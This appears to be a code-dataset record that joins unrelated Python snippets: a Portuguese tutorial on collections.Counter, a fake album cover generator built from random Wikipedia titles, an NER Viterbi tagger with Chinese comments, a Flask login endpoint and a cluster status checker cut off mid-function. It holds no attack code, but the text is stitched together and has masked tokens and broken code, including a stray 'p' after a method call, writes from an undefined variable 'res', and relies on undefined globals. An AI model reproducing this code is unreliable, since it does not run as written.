"step-5": "\"\"\"\r\nModulo collection - Counter\r\n\r\nCollections -> High-performance Container Datatypes\r\n\r\nCounter -> Recebe um interável como parametro e cria um objeto do tipo Collections Counter\r\nque é parecido com um dicionario, contendo como chave o elemento da lista passada como\r\nparametro e como valor a quantidade de ocorrencias desse elemento.\r\n\r\n\"\"\"\r\n\r\n# Utlizando o counter\r\n\r\nfrom collections import Counter\r\n\r\n# Exemplo 1\r\n\r\n# Podemos utilizar qualquer iteravel, aqui usamos uma lista\r\nlista_1 = [3, 7, 40, 3, 7, 3, 7, 16, 3, 40, 7, 21, 7]\r\n\r\nresultado = Counter(lista_1) # chave/valor\r\n\r\nprint(f'resultado: {resultado} || seu tipo: {type(resultado)}')\r\n# obs: cada elemento da lista ficou como chave e o valor o número de ocorrencias\r\nprint('--------------\\n')\r\n\r\n# Exemplo 2\r\n\r\nprint(f'Nasca de bacana: \\n {Counter(\"Nasca de bacana\")}')\r\n\r\nprint('--------------\\n')\r\n\r\ntexto = \"\"\"Minha terra tem palmeiras, Onde canta o Sabiá;\r\nAs aves, que aqui gorjeiam, Não gorjeiam como lá.\r\nNosso céu tem mais estrelas, Nossas várzeas têm mais flores,\r\nNossos bosques têm mais vida, Nossa vida mais amores. \"\"\"\r\n\r\npalavras = texto.split()\r\n\r\n#print(palavras)\r\nresultado2 = Counter(palavras)\r\n\r\nprint(f'ocorrencias de palavras: {resultado2}')\r\n\r\n# as 'n' mais comuns\r\nprint(f'as \"5\" mais comuns: {resultado2.most_common(5)}')\r\nprint(\"----------------------\")\r\n\r\nprint(dir(Counter))\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Inspiration: [Fake Album Covers](https://fakealbumcovers.com/)
from IPython.display import Image as IPythonImage
from PIL import Image
from PIL import ImageFont
from PIL import ImageDraw
import requests
from xml.etree import ElementTree as ET
def display_cover(top,bottom ):
name='album_art_raw.png'
album_art_raw = requests.get('https://picsum.photos/500/500/?random')
with open(name,'wb') as album_art_raw_file:
album_art_raw_file.write(album_art_raw.content)
img = Image.open("album_art_raw.png")
draw = ImageDraw.Draw(img)
band_name_font = ImageFont.truetype("/usr/share/fonts/truetype/dejavu/DejaVuSans-Bold.ttf", 25) #25pt font
album_name_font = ImageFont.truetype("/usr/share/fonts/truetype/dejavu/DejaVuSans-Bold.ttf", 20) # 20pt font
band_x, band_y = 50, 50
album_x, album_y = 50, 400
outline_color ="black"
draw.text((band_x-1, band_y-1), top, font=band_name_font, fill=outline_color)
draw.text((band_x+1, band_y-1), top, font=band_name_font, fill=outline_color)
draw.text((band_x-1, band_y+1), top, font=band_name_font, fill=outline_color)
draw.text((band_x+1, band_y+1), top, font=band_name_font, fill=outline_color)
draw.text((album_x-1, album_y-1), bottom , font=album_name_font, fill=outline_color)
draw.text((album_x+1, album_y-1), bottom , font=album_name_font, fill=outline_color)
draw.text((album_x-1, album_y+1), bottom , font=album_name_font, fill=outline_color)
draw.text((album_x+1, album_y+1), bottom , font=album_name_font, fill=outline_color)
draw.text((band_x,band_y),top,(255,255,255),font=band_name_font)
draw.text((album_x, album_y),bottom,(255,255,255),font=album_name_font)
return img
wikipedia='https://en.wikipedia.org/wiki/Special:Random'
page = requests.get(wikipedia).text.strip()
file= ET.fromstring(page).find('head/title')
band_title = file.text.replace(' - Wikipedia','')
wikipedia='https://en.wikipedia.org/wiki/Special:Random'
page = requests.get(wikipedia).text.strip()
file= ET.fromstring(page).find('head/title')
album_title = file.text.replace(' - Wikipedia','')
print(album_title)
print("Your band: ", band_title)
print("Your album: ", album_title)
img = display_cover(band_title,album_title)
img.save('sample-out.png')
IPythonImage(filename='sample-out.png')
|
normal
|
{
"blob_id": "07215403750be53994ae36727b6f790202b88697",
"index": 253,
"step-1": "# Inspiration: [Fake Album Covers](https://fakealbumcovers.com/)\nfrom IPython.display import Image as IPythonImage\nfrom PIL import Image\nfrom PIL import ImageFont\nfrom PIL import ImageDraw\n\nimport requests\nfrom xml.etree import ElementTree as ET\n\ndef display_cover(top,bottom ):\n \n name='album_art_raw.png'\n album_art_raw = requests.get('https://picsum.photos/500/500/?random')\n \n with open(name,'wb') as album_art_raw_file:\n album_art_raw_file.write(album_art_raw.content)\n\n img = Image.open(\"album_art_raw.png\")\n draw = ImageDraw.Draw(img)\n\n band_name_font = ImageFont.truetype(\"/usr/share/fonts/truetype/dejavu/DejaVuSans-Bold.ttf\", 25) #25pt font\n album_name_font = ImageFont.truetype(\"/usr/share/fonts/truetype/dejavu/DejaVuSans-Bold.ttf\", 20) # 20pt font\n\n band_x, band_y = 50, 50\n album_x, album_y = 50, 400\n\n outline_color =\"black\"\n\n draw.text((band_x-1, band_y-1), top, font=band_name_font, fill=outline_color)\n draw.text((band_x+1, band_y-1), top, font=band_name_font, fill=outline_color)\n draw.text((band_x-1, band_y+1), top, font=band_name_font, fill=outline_color)\n draw.text((band_x+1, band_y+1), top, font=band_name_font, fill=outline_color)\n\n draw.text((album_x-1, album_y-1), bottom , font=album_name_font, fill=outline_color)\n draw.text((album_x+1, album_y-1), bottom , font=album_name_font, fill=outline_color)\n draw.text((album_x-1, album_y+1), bottom , font=album_name_font, fill=outline_color)\n draw.text((album_x+1, album_y+1), bottom , font=album_name_font, fill=outline_color)\n\n draw.text((band_x,band_y),top,(255,255,255),font=band_name_font)\n draw.text((album_x, album_y),bottom,(255,255,255),font=album_name_font)\n\n return img\n\n\nwikipedia='https://en.wikipedia.org/wiki/Special:Random'\npage = requests.get(wikipedia).text.strip()\nfile= ET.fromstring(page).find('head/title')\nband_title = file.text.replace(' - Wikipedia','')\n\nwikipedia='https://en.wikipedia.org/wiki/Special:Random'\npage = requests.get(wikipedia).text.strip()p\nfile= ET.fromstring(page).find('head/title')\nalbum_title = file.text.replace(' - Wikipedia','')\nprint(album_title)\n\nprint(\"Your band: \", band_title)\nprint(\"Your album: \", album_title)\n\nimg = display_cover(band_title,album_title)\n\n\nimg.save('sample-out.png')\n\nIPythonImage(filename='sample-out.png')",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
def Viterbi(sentence, q, e):
K = list(Count_y.keys())
Pi = {}
bp = {}
n = len(sentence)
for i in range(n + 1):
Pi[i - 1] = {}
bp[i - 1] = {}
Pi[-1]['*', '*'] = 1
for k in range(n):
K0 = K
K1 = K
K2 = K
if k == 0:
K0 = ['*']
K1 = ['*']
elif k == 1:
K0 = ['*']
"""
elif k == n-1:
K2 = K + ["STOP"]
"""
for u in K1:
for v in K2:
p = 0
w_arg = ''
key = sentence[k]
if key not in Count_x or Count_x[key] < 5:
key = '_RARE_'
for w in K0:
if (w, u) in Pi[k - 1] and (w, u, v) in q and (v, key
) in e[key]:
p1 = Pi[k - 1][w, u] * q[w, u, v] * e[key][v, key]
if p1 > p:
p = p1
w_arg = w
Pi[k][u, v] = p
bp[k][u, v] = w_arg
y0 = ''
y1 = ''
pmax = 0
for u in K:
for v in K:
if (u, v) in Pi[n - 1] and (u, v, 'STOP') in q:
p = Pi[n - 1][u, v] * q[u, v, 'STOP']
if p > pmax:
pmax = p
y0 = u
y1 = v
tag = [y1, y0]
for k in range(n - 3, -1, -1):
y = bp[k + 2][y0, y1]
tag.append(y)
y1 = y0
y0 = y
tag = tag[::-1][2:]
return tag, pmax
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open(File) as f:
for i in f.readlines():
data = i.split()
if data[1] == '2-GRAM':
q2[data[2], data[3]] = float(data[0])
q3[data[2], data[3]] = {}
elif data[1] == '3-GRAM':
q3[data[2], data[3]][data[2], data[3], data[4]] = float(data[0])
<|reserved_special_token_0|>
for i in q3:
for j in q3[i]:
q[j] = q3[i][j] / q2[i]
<|reserved_special_token_0|>
def Viterbi(sentence, q, e):
K = list(Count_y.keys())
Pi = {}
bp = {}
n = len(sentence)
for i in range(n + 1):
Pi[i - 1] = {}
bp[i - 1] = {}
Pi[-1]['*', '*'] = 1
for k in range(n):
K0 = K
K1 = K
K2 = K
if k == 0:
K0 = ['*']
K1 = ['*']
elif k == 1:
K0 = ['*']
"""
elif k == n-1:
K2 = K + ["STOP"]
"""
for u in K1:
for v in K2:
p = 0
w_arg = ''
key = sentence[k]
if key not in Count_x or Count_x[key] < 5:
key = '_RARE_'
for w in K0:
if (w, u) in Pi[k - 1] and (w, u, v) in q and (v, key
) in e[key]:
p1 = Pi[k - 1][w, u] * q[w, u, v] * e[key][v, key]
if p1 > p:
p = p1
w_arg = w
Pi[k][u, v] = p
bp[k][u, v] = w_arg
y0 = ''
y1 = ''
pmax = 0
for u in K:
for v in K:
if (u, v) in Pi[n - 1] and (u, v, 'STOP') in q:
p = Pi[n - 1][u, v] * q[u, v, 'STOP']
if p > pmax:
pmax = p
y0 = u
y1 = v
tag = [y1, y0]
for k in range(n - 3, -1, -1):
y = bp[k + 2][y0, y1]
tag.append(y)
y1 = y0
y0 = y
tag = tag[::-1][2:]
return tag, pmax
<|reserved_special_token_0|>
for sentence in Sentence:
tag, p = Viterbi(sentence, q, e_proc)
res_viterbi.append(' '.join(tag) + ' ' + str(p) + '\n')
<|reserved_special_token_0|>
with open(File, 'w+') as f:
    for i in res_viterbi:
f.writelines(i)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
File = 'ner_proc.counts'
q2 = {}
q3 = {}
with open(File) as f:
for i in f.readlines():
data = i.split()
if data[1] == '2-GRAM':
q2[data[2], data[3]] = float(data[0])
q3[data[2], data[3]] = {}
elif data[1] == '3-GRAM':
q3[data[2], data[3]][data[2], data[3], data[4]] = float(data[0])
q = {}
for i in q3:
for j in q3[i]:
q[j] = q3[i][j] / q2[i]
<|reserved_special_token_0|>
def Viterbi(sentence, q, e):
K = list(Count_y.keys())
Pi = {}
bp = {}
n = len(sentence)
for i in range(n + 1):
Pi[i - 1] = {}
bp[i - 1] = {}
Pi[-1]['*', '*'] = 1
for k in range(n):
K0 = K
K1 = K
K2 = K
if k == 0:
K0 = ['*']
K1 = ['*']
elif k == 1:
K0 = ['*']
"""
elif k == n-1:
K2 = K + ["STOP"]
"""
for u in K1:
for v in K2:
p = 0
w_arg = ''
key = sentence[k]
if key not in Count_x or Count_x[key] < 5:
key = '_RARE_'
for w in K0:
if (w, u) in Pi[k - 1] and (w, u, v) in q and (v, key
) in e[key]:
p1 = Pi[k - 1][w, u] * q[w, u, v] * e[key][v, key]
if p1 > p:
p = p1
w_arg = w
Pi[k][u, v] = p
bp[k][u, v] = w_arg
y0 = ''
y1 = ''
pmax = 0
for u in K:
for v in K:
if (u, v) in Pi[n - 1] and (u, v, 'STOP') in q:
p = Pi[n - 1][u, v] * q[u, v, 'STOP']
if p > pmax:
pmax = p
y0 = u
y1 = v
tag = [y1, y0]
for k in range(n - 3, -1, -1):
y = bp[k + 2][y0, y1]
tag.append(y)
y1 = y0
y0 = y
tag = tag[::-1][2:]
return tag, pmax
res_viterbi = []
for sentence in Sentence:
tag, p = Viterbi(sentence, q, e_proc)
res_viterbi.append(' '.join(tag) + ' ' + str(p) + '\n')
File = 'ner_dev_viterbi.dat'
with open(File, 'w+') as f:
    for i in res_viterbi:
f.writelines(i)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import numpy as np
File = 'ner_proc.counts'
q2 = {}
q3 = {}
with open(File) as f:
for i in f.readlines():
data = i.split()
if data[1] == '2-GRAM':
q2[data[2], data[3]] = float(data[0])
q3[data[2], data[3]] = {}
elif data[1] == '3-GRAM':
q3[data[2], data[3]][data[2], data[3], data[4]] = float(data[0])
q = {}
for i in q3:
for j in q3[i]:
q[j] = q3[i][j] / q2[i]
<|reserved_special_token_0|>
def Viterbi(sentence, q, e):
K = list(Count_y.keys())
Pi = {}
bp = {}
n = len(sentence)
for i in range(n + 1):
Pi[i - 1] = {}
bp[i - 1] = {}
Pi[-1]['*', '*'] = 1
for k in range(n):
K0 = K
K1 = K
K2 = K
if k == 0:
K0 = ['*']
K1 = ['*']
elif k == 1:
K0 = ['*']
"""
elif k == n-1:
K2 = K + ["STOP"]
"""
for u in K1:
for v in K2:
p = 0
w_arg = ''
key = sentence[k]
if key not in Count_x or Count_x[key] < 5:
key = '_RARE_'
for w in K0:
if (w, u) in Pi[k - 1] and (w, u, v) in q and (v, key
) in e[key]:
p1 = Pi[k - 1][w, u] * q[w, u, v] * e[key][v, key]
if p1 > p:
p = p1
w_arg = w
Pi[k][u, v] = p
bp[k][u, v] = w_arg
y0 = ''
y1 = ''
pmax = 0
for u in K:
for v in K:
if (u, v) in Pi[n - 1] and (u, v, 'STOP') in q:
p = Pi[n - 1][u, v] * q[u, v, 'STOP']
if p > pmax:
pmax = p
y0 = u
y1 = v
tag = [y1, y0]
for k in range(n - 3, -1, -1):
y = bp[k + 2][y0, y1]
tag.append(y)
y1 = y0
y0 = y
tag = tag[::-1][2:]
return tag, pmax
res_viterbi = []
for sentence in Sentence:
tag, p = Viterbi(sentence, q, e_proc)
res_viterbi.append(' '.join(tag) + ' ' + str(p) + '\n')
File = 'ner_dev_viterbi.dat'
with open(File, 'w+') as f:
    for i in res_viterbi:
f.writelines(i)
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
"""
Created on Wed May 15 17:05:30 2019
@author: qinzhen
"""
import numpy as np
# =============================================================================
# Q5
# =============================================================================
#### Part 1: compute the MLE estimates
File = "ner_proc.counts"
q2 = {}
q3 = {}
with open(File) as f:
for i in f.readlines():
        #split the data fields
        data = i.split()
        #check the n-gram type
if data[1] == "2-GRAM":
q2[(data[2], data[3])] = float(data[0])
q3[(data[2], data[3])] = {}
elif data[1] == "3-GRAM":
q3[(data[2], data[3])][(data[2], data[3], data[4])] = float(data[0])
#compute the MLE
q = {}
for i in q3:
for j in q3[i]:
q[j] = q3[i][j] / q2[i]
'''
#compute the log probabilities
for j in q:
res = ' '.join(j) + " : " + str(math.log(q[j]))
print(res)
'''
#### Part 2
def Viterbi(sentence, q, e):
#K_0 = *
    #number of tags
    K = list(Count_y.keys())
    #dynamic programming table
    Pi = {}
    #back-pointer table
    bp = {}
    #number of words
n = len(sentence)
for i in range(n + 1):
Pi[i-1] = {}
bp[i-1] = {}
    #initialization
Pi[-1][("*", "*")] = 1
    #iterate over the words in the sentence
for k in range(n):
        #tags that can be chosen at this position
K0 = K
K1 = K
K2 = K
if k == 0:
K0 = ["*"]
K1 = ["*"]
elif k == 1:
K0 = ["*"]
'''
elif k == n-1:
K2 = K + ["STOP"]
'''
        #loop over tag pairs
for u in K1:
for v in K2:
p = 0
w_arg = ""
key = sentence[k]
if key not in Count_x or Count_x[key] < 5:
key = "_RARE_"
for w in K0:
if (w, u) in Pi[k-1] and (w, u, v) in q and (v, key) in e[key]:
p1 = Pi[k-1][(w, u)] * q[(w, u, v)] * e[key][(v, key)]
if p1 > p:
p = p1
w_arg = w
Pi[k][(u, v)] = p
bp[k][(u, v)] = w_arg
    #compute the last two tags
y0 = ""
y1 = ""
pmax = 0
for u in K:
for v in K:
if (u, v) in Pi[n-1] and (u, v, "STOP") in q:
p = Pi[n-1][(u, v)] * q[(u, v, "STOP")]
if p > pmax:
pmax = p
y0 = u
y1 = v
tag = [y1, y0]
for k in range(n-3, -1, -1):
y = bp[k+2][(y0, y1)]
tag.append(y)
        #update
y1 = y0
y0 = y
    #reverse
tag = tag[::-1][2:]
return tag, pmax
res_viterbi = []
for sentence in Sentence:
#print(sentence)
tag, p = Viterbi(sentence, q, e_proc)
res_viterbi.append(" ".join(tag) + " " + str(p) + "\n")
#write out the results
File = "ner_dev_viterbi.dat"
with open(File, "w+") as f:
    for i in res_viterbi:
f.writelines(i)
|
flexible
|
{
"blob_id": "9683c7df01eda0d97615fb3e8f9496ecc95d1d32",
"index": 8494,
"step-1": "<mask token>\n\n\ndef Viterbi(sentence, q, e):\n K = list(Count_y.keys())\n Pi = {}\n bp = {}\n n = len(sentence)\n for i in range(n + 1):\n Pi[i - 1] = {}\n bp[i - 1] = {}\n Pi[-1]['*', '*'] = 1\n for k in range(n):\n K0 = K\n K1 = K\n K2 = K\n if k == 0:\n K0 = ['*']\n K1 = ['*']\n elif k == 1:\n K0 = ['*']\n \"\"\"\n elif k == n-1:\n K2 = K + [\"STOP\"]\n \"\"\"\n for u in K1:\n for v in K2:\n p = 0\n w_arg = ''\n key = sentence[k]\n if key not in Count_x or Count_x[key] < 5:\n key = '_RARE_'\n for w in K0:\n if (w, u) in Pi[k - 1] and (w, u, v) in q and (v, key\n ) in e[key]:\n p1 = Pi[k - 1][w, u] * q[w, u, v] * e[key][v, key]\n if p1 > p:\n p = p1\n w_arg = w\n Pi[k][u, v] = p\n bp[k][u, v] = w_arg\n y0 = ''\n y1 = ''\n pmax = 0\n for u in K:\n for v in K:\n if (u, v) in Pi[n - 1] and (u, v, 'STOP') in q:\n p = Pi[n - 1][u, v] * q[u, v, 'STOP']\n if p > pmax:\n pmax = p\n y0 = u\n y1 = v\n tag = [y1, y0]\n for k in range(n - 3, -1, -1):\n y = bp[k + 2][y0, y1]\n tag.append(y)\n y1 = y0\n y0 = y\n tag = tag[::-1][2:]\n return tag, pmax\n\n\n<mask token>\n",
"step-2": "<mask token>\nwith open(File) as f:\n for i in f.readlines():\n data = i.split()\n if data[1] == '2-GRAM':\n q2[data[2], data[3]] = float(data[0])\n q3[data[2], data[3]] = {}\n elif data[1] == '3-GRAM':\n q3[data[2], data[3]][data[2], data[3], data[4]] = float(data[0])\n<mask token>\nfor i in q3:\n for j in q3[i]:\n q[j] = q3[i][j] / q2[i]\n<mask token>\n\n\ndef Viterbi(sentence, q, e):\n K = list(Count_y.keys())\n Pi = {}\n bp = {}\n n = len(sentence)\n for i in range(n + 1):\n Pi[i - 1] = {}\n bp[i - 1] = {}\n Pi[-1]['*', '*'] = 1\n for k in range(n):\n K0 = K\n K1 = K\n K2 = K\n if k == 0:\n K0 = ['*']\n K1 = ['*']\n elif k == 1:\n K0 = ['*']\n \"\"\"\n elif k == n-1:\n K2 = K + [\"STOP\"]\n \"\"\"\n for u in K1:\n for v in K2:\n p = 0\n w_arg = ''\n key = sentence[k]\n if key not in Count_x or Count_x[key] < 5:\n key = '_RARE_'\n for w in K0:\n if (w, u) in Pi[k - 1] and (w, u, v) in q and (v, key\n ) in e[key]:\n p1 = Pi[k - 1][w, u] * q[w, u, v] * e[key][v, key]\n if p1 > p:\n p = p1\n w_arg = w\n Pi[k][u, v] = p\n bp[k][u, v] = w_arg\n y0 = ''\n y1 = ''\n pmax = 0\n for u in K:\n for v in K:\n if (u, v) in Pi[n - 1] and (u, v, 'STOP') in q:\n p = Pi[n - 1][u, v] * q[u, v, 'STOP']\n if p > pmax:\n pmax = p\n y0 = u\n y1 = v\n tag = [y1, y0]\n for k in range(n - 3, -1, -1):\n y = bp[k + 2][y0, y1]\n tag.append(y)\n y1 = y0\n y0 = y\n tag = tag[::-1][2:]\n return tag, pmax\n\n\n<mask token>\nfor sentence in Sentence:\n tag, p = Viterbi(sentence, q, e_proc)\n res_viterbi.append(' '.join(tag) + ' ' + str(p) + '\\n')\n<mask token>\nwith open(File, 'w+') as f:\n for i in res:\n f.writelines(i)\n",
"step-3": "<mask token>\nFile = 'ner_proc.counts'\nq2 = {}\nq3 = {}\nwith open(File) as f:\n for i in f.readlines():\n data = i.split()\n if data[1] == '2-GRAM':\n q2[data[2], data[3]] = float(data[0])\n q3[data[2], data[3]] = {}\n elif data[1] == '3-GRAM':\n q3[data[2], data[3]][data[2], data[3], data[4]] = float(data[0])\nq = {}\nfor i in q3:\n for j in q3[i]:\n q[j] = q3[i][j] / q2[i]\n<mask token>\n\n\ndef Viterbi(sentence, q, e):\n K = list(Count_y.keys())\n Pi = {}\n bp = {}\n n = len(sentence)\n for i in range(n + 1):\n Pi[i - 1] = {}\n bp[i - 1] = {}\n Pi[-1]['*', '*'] = 1\n for k in range(n):\n K0 = K\n K1 = K\n K2 = K\n if k == 0:\n K0 = ['*']\n K1 = ['*']\n elif k == 1:\n K0 = ['*']\n \"\"\"\n elif k == n-1:\n K2 = K + [\"STOP\"]\n \"\"\"\n for u in K1:\n for v in K2:\n p = 0\n w_arg = ''\n key = sentence[k]\n if key not in Count_x or Count_x[key] < 5:\n key = '_RARE_'\n for w in K0:\n if (w, u) in Pi[k - 1] and (w, u, v) in q and (v, key\n ) in e[key]:\n p1 = Pi[k - 1][w, u] * q[w, u, v] * e[key][v, key]\n if p1 > p:\n p = p1\n w_arg = w\n Pi[k][u, v] = p\n bp[k][u, v] = w_arg\n y0 = ''\n y1 = ''\n pmax = 0\n for u in K:\n for v in K:\n if (u, v) in Pi[n - 1] and (u, v, 'STOP') in q:\n p = Pi[n - 1][u, v] * q[u, v, 'STOP']\n if p > pmax:\n pmax = p\n y0 = u\n y1 = v\n tag = [y1, y0]\n for k in range(n - 3, -1, -1):\n y = bp[k + 2][y0, y1]\n tag.append(y)\n y1 = y0\n y0 = y\n tag = tag[::-1][2:]\n return tag, pmax\n\n\nres_viterbi = []\nfor sentence in Sentence:\n tag, p = Viterbi(sentence, q, e_proc)\n res_viterbi.append(' '.join(tag) + ' ' + str(p) + '\\n')\nFile = 'ner_dev_viterbi.dat'\nwith open(File, 'w+') as f:\n for i in res:\n f.writelines(i)\n",
"step-4": "<mask token>\nimport numpy as np\nFile = 'ner_proc.counts'\nq2 = {}\nq3 = {}\nwith open(File) as f:\n for i in f.readlines():\n data = i.split()\n if data[1] == '2-GRAM':\n q2[data[2], data[3]] = float(data[0])\n q3[data[2], data[3]] = {}\n elif data[1] == '3-GRAM':\n q3[data[2], data[3]][data[2], data[3], data[4]] = float(data[0])\nq = {}\nfor i in q3:\n for j in q3[i]:\n q[j] = q3[i][j] / q2[i]\n<mask token>\n\n\ndef Viterbi(sentence, q, e):\n K = list(Count_y.keys())\n Pi = {}\n bp = {}\n n = len(sentence)\n for i in range(n + 1):\n Pi[i - 1] = {}\n bp[i - 1] = {}\n Pi[-1]['*', '*'] = 1\n for k in range(n):\n K0 = K\n K1 = K\n K2 = K\n if k == 0:\n K0 = ['*']\n K1 = ['*']\n elif k == 1:\n K0 = ['*']\n \"\"\"\n elif k == n-1:\n K2 = K + [\"STOP\"]\n \"\"\"\n for u in K1:\n for v in K2:\n p = 0\n w_arg = ''\n key = sentence[k]\n if key not in Count_x or Count_x[key] < 5:\n key = '_RARE_'\n for w in K0:\n if (w, u) in Pi[k - 1] and (w, u, v) in q and (v, key\n ) in e[key]:\n p1 = Pi[k - 1][w, u] * q[w, u, v] * e[key][v, key]\n if p1 > p:\n p = p1\n w_arg = w\n Pi[k][u, v] = p\n bp[k][u, v] = w_arg\n y0 = ''\n y1 = ''\n pmax = 0\n for u in K:\n for v in K:\n if (u, v) in Pi[n - 1] and (u, v, 'STOP') in q:\n p = Pi[n - 1][u, v] * q[u, v, 'STOP']\n if p > pmax:\n pmax = p\n y0 = u\n y1 = v\n tag = [y1, y0]\n for k in range(n - 3, -1, -1):\n y = bp[k + 2][y0, y1]\n tag.append(y)\n y1 = y0\n y0 = y\n tag = tag[::-1][2:]\n return tag, pmax\n\n\nres_viterbi = []\nfor sentence in Sentence:\n tag, p = Viterbi(sentence, q, e_proc)\n res_viterbi.append(' '.join(tag) + ' ' + str(p) + '\\n')\nFile = 'ner_dev_viterbi.dat'\nwith open(File, 'w+') as f:\n for i in res:\n f.writelines(i)\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 15 17:05:30 2019\n\n@author: qinzhen\n\"\"\"\n\nimport numpy as np\n\n# =============================================================================\n# Q5\n# =============================================================================\n#### Part 1 计算MLE\nFile = \"ner_proc.counts\"\nq2 = {}\nq3 = {}\nwith open(File) as f:\n for i in f.readlines():\n #分隔数据\n data = i.split()\n #判断\n if data[1] == \"2-GRAM\":\n q2[(data[2], data[3])] = float(data[0])\n q3[(data[2], data[3])] = {}\n elif data[1] == \"3-GRAM\":\n q3[(data[2], data[3])][(data[2], data[3], data[4])] = float(data[0])\n\n#计算 MLE\nq = {}\nfor i in q3:\n for j in q3[i]:\n q[j] = q3[i][j] / q2[i]\n'''\n#计算对数概率\nfor j in q:\n res = ' '.join(j) + \" : \" + str(math.log(q[j]))\n print(res)\n \n'''\n \n#### Part 2\ndef Viterbi(sentence, q, e):\n #K_0 = *\n #标签数量\n K = list(Count_y.keys())\n #动态规划表\n Pi = {}\n #反向指针表\n bp = {}\n #单词数量\n n = len(sentence)\n for i in range(n + 1):\n Pi[i-1] = {}\n bp[i-1] = {}\n #初始化\n Pi[-1][(\"*\", \"*\")] = 1\n #遍历句子中的单词\n for k in range(n):\n #可以选的标签\n K0 = K\n K1 = K\n K2 = K\n if k == 0:\n K0 = [\"*\"]\n K1 = [\"*\"]\n elif k == 1:\n K0 = [\"*\"]\n '''\n elif k == n-1:\n K2 = K + [\"STOP\"]\n '''\n \n #循环\n for u in K1:\n for v in K2:\n p = 0\n w_arg = \"\"\n key = sentence[k]\n if key not in Count_x or Count_x[key] < 5:\n key = \"_RARE_\"\n for w in K0:\n if (w, u) in Pi[k-1] and (w, u, v) in q and (v, key) in e[key]:\n p1 = Pi[k-1][(w, u)] * q[(w, u, v)] * e[key][(v, key)]\n if p1 > p:\n p = p1\n w_arg = w\n Pi[k][(u, v)] = p\n bp[k][(u, v)] = w_arg\n \n #计算最后两个标签\n y0 = \"\"\n y1 = \"\"\n pmax = 0\n for u in K:\n for v in K:\n if (u, v) in Pi[n-1] and (u, v, \"STOP\") in q:\n p = Pi[n-1][(u, v)] * q[(u, v, \"STOP\")]\n if p > pmax:\n pmax = p\n y0 = u\n y1 = v\n \n tag = [y1, y0]\n \n for k in range(n-3, -1, -1):\n y = bp[k+2][(y0, y1)]\n tag.append(y)\n #更新\n y1 = y0\n y0 = y\n \n #反序\n tag = tag[::-1][2:]\n \n return tag, pmax\n\nres_viterbi = []\nfor sentence in Sentence:\n #print(sentence)\n tag, p = Viterbi(sentence, q, e_proc)\n res_viterbi.append(\" \".join(tag) + \" \" + str(p) + \"\\n\")\n\n\n\n#产生结果 \nFile = \"ner_dev_viterbi.dat\"\nwith open(File, \"w+\") as f:\n for i in res:\n f.writelines(i)",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@api.route('/login/', methods=['POST'])
def login():
email = request.get_json().get('email')
pwd = request.get_json().get('password')
user = User.query.filter_by(email=email).first()
if not user:
return jsonify({}), 403
if not user.verify_password(pwd):
return jsonify({}), 400
token = user.generate_auth_token()
return jsonify({'token': token}), 200
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from flask import jsonify, request
from . import api
from muxiwebsite.models import User
from muxiwebsite import db
@api.route('/login/', methods=['POST'])
def login():
email = request.get_json().get('email')
pwd = request.get_json().get('password')
user = User.query.filter_by(email=email).first()
if not user:
return jsonify({}), 403
if not user.verify_password(pwd):
return jsonify({}), 400
token = user.generate_auth_token()
return jsonify({'token': token}), 200
<|reserved_special_token_1|>
# coding: utf-8
"""
login.py
~~~~~~~~
    Login API for the Muxi website
"""
from flask import jsonify, request
from . import api
from muxiwebsite.models import User
from muxiwebsite import db
@api.route('/login/', methods=['POST'])
def login():
email = request.get_json().get("email")
pwd = request.get_json().get("password")
user = User.query.filter_by(email=email).first()
if not user:
return jsonify({}), 403
if not user.verify_password(pwd):
return jsonify({}), 400
token = user.generate_auth_token()
return jsonify ({
'token': token,
}), 200
|
flexible
|
{
"blob_id": "a0dbb374f803cb05a35f823f54ef5f14eaf328b2",
"index": 3688,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/login/', methods=['POST'])\ndef login():\n email = request.get_json().get('email')\n pwd = request.get_json().get('password')\n user = User.query.filter_by(email=email).first()\n if not user:\n return jsonify({}), 403\n if not user.verify_password(pwd):\n return jsonify({}), 400\n token = user.generate_auth_token()\n return jsonify({'token': token}), 200\n",
"step-3": "<mask token>\nfrom flask import jsonify, request\nfrom . import api\nfrom muxiwebsite.models import User\nfrom muxiwebsite import db\n\n\[email protected]('/login/', methods=['POST'])\ndef login():\n email = request.get_json().get('email')\n pwd = request.get_json().get('password')\n user = User.query.filter_by(email=email).first()\n if not user:\n return jsonify({}), 403\n if not user.verify_password(pwd):\n return jsonify({}), 400\n token = user.generate_auth_token()\n return jsonify({'token': token}), 200\n",
"step-4": "# coding: utf-8\n\n\"\"\"\n login.py\n ~~~~~~~~\n\n 木犀官网登陆API\n\n\"\"\"\n\nfrom flask import jsonify, request\nfrom . import api\nfrom muxiwebsite.models import User\nfrom muxiwebsite import db\n\[email protected]('/login/', methods=['POST'])\ndef login():\n email = request.get_json().get(\"email\")\n pwd = request.get_json().get(\"password\")\n\n user = User.query.filter_by(email=email).first()\n if not user:\n return jsonify({}), 403\n if not user.verify_password(pwd):\n return jsonify({}), 400\n\n token = user.generate_auth_token()\n return jsonify ({\n 'token': token,\n }), 200\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def main():
""" Execute main program
"""
import argparse
parser = argparse.ArgumentParser(description='Check nodes status.')
parser.add_argument('-o', '--show-job-owners', action='store_true',
help='List jobs running on nodes')
parser.add_argument('-s', '--filter-states', help=
'Display only nodes in FILTER_STATES (comma separated).')
args = parser.parse_args()
check_status(args)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def check_status(args):
""" Print node details
:param args: Arguments from argparse
:type args: argparse.Namespace
"""
cluster = Cluster(jobs_qstat=True, nodes=True, link=True)
nodes = []
if args.filter_states:
cluster.filter_node_states(set(args.filter_states.lower().split(',')))
